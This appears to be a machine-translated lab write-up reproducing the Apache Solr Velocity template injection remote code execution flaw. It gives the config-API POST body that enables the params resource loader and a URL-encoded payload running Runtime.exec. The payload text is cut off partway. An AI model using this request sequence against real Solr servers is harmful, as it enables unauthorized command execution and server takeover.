Introduction to 0x01
Solr is an enterprise-level independent search application server, which can provide services through the Web service API interface. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes. You can also make a search request through Http Get operation and get the return result in XML format. 
0x02 vulnerability introduction
There is a VelocityResponseWriter component in Solr, and an attacker can construct a specific request to modify the relevant configuration, so that the VelocityResponseWriter component allows the specified template to be loaded, which leads to a vulnerability in which the Velocity template is injected into the remote command execution, and the attacker can directly gain the server authority by using this vulnerability.
0x03 influence range
Apache Solr 5.x-8.2.0, there is a config API version.
0x04 environment construction
Install the java8 environment, and then download Solr at the following address:
https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip
After the download is completed, unzip it and enter the bin directory for execution. /solr start
unzip solr-8.2.0.zip
There will be some warning messages at startup, which can be eliminated by modifying the solr.in.sh file under bin, and setting SOLR_ULIMIT_CHECKS to false.
vim solr.in.sh
Then start it again. /solr start root If it fails to start, just add -force 
Visit http://ip:8983 in the browser, and the following interface will appear 
However, it was found that core 
First, we manually create a folder of new_core under the /server/solr/ directory, and then copy the conf directory under/server/Solr/configsets/_ default/to the new_core directory, and then click to create 
0x05 vulnerability reappearance
After creating the Core, visit to see if the application config file can be accessed.
http://ip:8983/solr/new_core/config 
Apache Solr integrates VelocityResponseWriter plug-in by default. The default value of params.resource.loader.enabled in the initialization parameter of this plug-in is set to false, but the integration setting can be directly modified by POST request and set to true, and then a special GET request can be constructed to realize remote code execution.
Use Burp to grab the package of this page, directly construct a POST request, and add the following data.
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
Next, we can construct payload to implement RCE.
payload:
http://ip:8983/solr/test/select? q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27)) +%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime() .exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+
POC address: https://github.com/wyzxxz/Apache _ Solr _ rce _ via _ velocity _ template.
0x06 repair method
Update to the latest version
Copyright Description:No reproduction without permission。
Knowledge sharing community for developers。
Let more developers benefit from it。
Help developers share knowledge through the Internet。
Follow us
2023-12-04
Español
Português
简体中文